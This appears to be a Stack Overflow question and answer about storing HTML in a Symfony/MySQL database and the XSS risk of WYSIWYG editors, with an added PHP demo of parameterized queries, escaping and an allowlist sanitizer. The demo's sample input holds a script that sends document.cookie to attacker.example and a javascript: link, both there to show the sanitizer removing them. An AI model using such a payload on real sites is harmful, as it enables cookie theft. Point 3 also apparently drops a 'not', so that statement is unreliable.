php - How should HTML tags be kept in the database?

I am creating my new site. Now I am learning and using Symfony. I have a few questions.

  1. Why does Symfony by default allow adding HTML tags to the database? For example, I create a new module, go to module/new, enter <strong>test</strong> in the title and save it. In the MySQL database I have <strong>test</strong>. Is it safe?
  2. I know that if I simply use $test->getTitle() then this renders the text <strong>test</strong>, but what if I would like to add a WYSIWYG editor for user comments and use RawValue()? Users might not close tags (</strong>) and the whole site is broken...
  3. Could they, for example, steal cookies?
  4. Is there any safe WYSIWYG editor for Symfony? If I use CKEditor or TinyMCE, am I safe?
  5. Stack Overflow uses WMD markdown, but I can't find it anywhere. How does it keep HTML tags in the database? As **test**?

1 Reply


1a) Safe for what? As long as your database operations sanitize all user input via mysql_real_escape_string() before insertion into queries, then there's no way a malicious user could attack your database via injection attacks. HTML in the database is like any other piece of text in the database - it's just text with some extra "weird" characters.

1b) As for why it allows it, did you explicitly tell it to NOT allow HTML? PHP/Symfony/MySQL do exactly as you tell them to.

2) Ensuring that the HTML is valid is up to you. You can use things like HTML Purifier to fix "broken" html.

3) If you're doing HTML sanitization/filtration, then a user can embed <script> blocks into the html they're adding and steal cookies via that method...

4) Those editors are just editors. They display stuff and let you (or others) edit that displayed material. They're as safe or unsafe as you want them to be. They're just tools. If you provide a loaded gun to someone, then don't be surprised if someone gets shot.

5) Just because some text has tags in it, of any sort, doesn't make that text magically "different" from other text. MySQL doesn't care, need to know, or even HAVE to know that you're inserting markdown'd text into a field. It just stores what you tell it to, and pulls it back out when you want it to.
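The two halves of the answer (storage is just text; what matters is what you do on output) as one added, runnable example. This is not code from the question, the answer or Symfony; it assumes PHP 8 with the pdo_sqlite and dom extensions, uses an in-memory SQLite database in place of MySQL so it runs offline, and uses a PDO prepared statement where the answer mentions mysql_real_escape_string() (the mysql_* functions were removed in PHP 7). The function names (openDb, saveModule, loadModule, renderText, sanitizeHtml, filterNode), the table layout and the attacker.example URL are all made up for the demo. The allowlist sanitizer is a compact illustration of what HTML Purifier does; a real site should use HTML Purifier, as the answer suggests, rather than this.

```php
<?php
// Added demo, not Symfony code. SQLite in memory stands in for MySQL so it runs offline.
function openDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE module (id INTEGER PRIMARY KEY, title TEXT NOT NULL, body TEXT NOT NULL)');
    return $db;
}

// Storage: the prepared statement binds the values, so "<strong>test</strong>" (or a quote,
// or a semicolon) is stored verbatim as text and can never change the SQL.
function saveModule(PDO $db, string $title, string $body): int
{
    $stmt = $db->prepare('INSERT INTO module (title, body) VALUES (:title, :body)');
    $stmt->execute([':title' => $title, ':body' => $body]);
    return (int) $db->lastInsertId();
}

function loadModule(PDO $db, int $id): array
{
    $stmt = $db->prepare('SELECT title, body FROM module WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: throw new RuntimeException("module $id not found");
}

// Plain-text field (the title): escape on output, so the browser shows the literal text
// "<strong>test</strong>" and executes nothing. Twig's autoescape does exactly this.
function renderText(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Rich-text field (a WYSIWYG comment): parse, keep only allowlisted tags and attributes,
// re-serialize. Re-serializing also closes tags the user left open. Only this output
// may be printed raw; anything else is the loaded gun from point 4.
function sanitizeHtml(string $html): string
{
    $allowedTags  = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'a', 'blockquote', 'code'];
    $allowedAttrs = ['a' => ['href']];

    $doc = new DOMDocument();
    libxml_use_internal_errors(true);                  // broken markup is expected; no warnings
    $doc->loadHTML('<?xml encoding="UTF-8">' . $html); // libxml wraps the fragment in html/body
    libxml_clear_errors();

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';                                     // empty input: nothing to render
    }
    filterNode($body, $allowedTags, $allowedAttrs);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function filterNode(DOMNode $node, array $allowedTags, array $allowedAttrs): void
{
    // Iterate over a snapshot: the child list is modified inside the loop.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if (!($child instanceof DOMElement)) {
            if (!($child instanceof DOMText)) { $node->removeChild($child); } // comments, PIs, CDATA
            continue;
        }
        $tag = strtolower($child->tagName);
        if (in_array($tag, ['script', 'style', 'iframe', 'object', 'embed'], true)) {
            $node->removeChild($child);                // drop the element and its contents
            continue;
        }
        if (!in_array($tag, $allowedTags, true)) {     // div, span, font, ...: keep children only
            filterNode($child, $allowedTags, $allowedAttrs);
            while ($child->firstChild !== null) {
                $node->insertBefore($child->firstChild, $child);
            }
            $node->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes) as $attr) {
            $name = strtolower($attr->name);
            // onclick, style, etc. go; href stays only with a safe scheme (no javascript:, data:)
            $keep = in_array($name, $allowedAttrs[$tag] ?? [], true)
                && ($name !== 'href' || preg_match('#^(https?:|mailto:|/)#i', trim($attr->value)));
            if (!$keep) {
                $child->removeAttribute($attr->name);
            }
        }
        filterNode($child, $allowedTags, $allowedAttrs);
    }
}

// Constructed sample input: the title from the question, and a comment with an unclosed
// <strong>, a cookie-stealing <script> and a javascript: link carrying an onclick handler.
$db = openDb();
$id = saveModule($db, '<strong>test</strong>',
    '<strong>unclosed <script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
    . ' <a href="javascript:alert(1)" onclick="alert(2)">link</a>');
$row = loadModule($db, $id);
echo renderText($row['title']), "\n";   // the tags come out as literal text, not markup
echo sanitizeHtml($row['body']), "\n";  // script, href and onclick removed, <strong> closed
```

The point the answer makes in 1a and 5 is visible in saveModule: the database never interprets the markup, so what you store is irrelevant to safety as long as the query is parameterized. The decision that matters is made per output context: a title goes through escaping (in Symfony templates, Twig's autoescape; do not mark it raw), while WYSIWYG content goes through a sanitizer and only the sanitizer's result is ever printed raw (the RawValue() from the question or Twig's raw filter). Feeding the stored comment to raw output without that step is exactly the cookie-theft case from point 3, and CKEditor or TinyMCE on the input side changes nothing about it.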

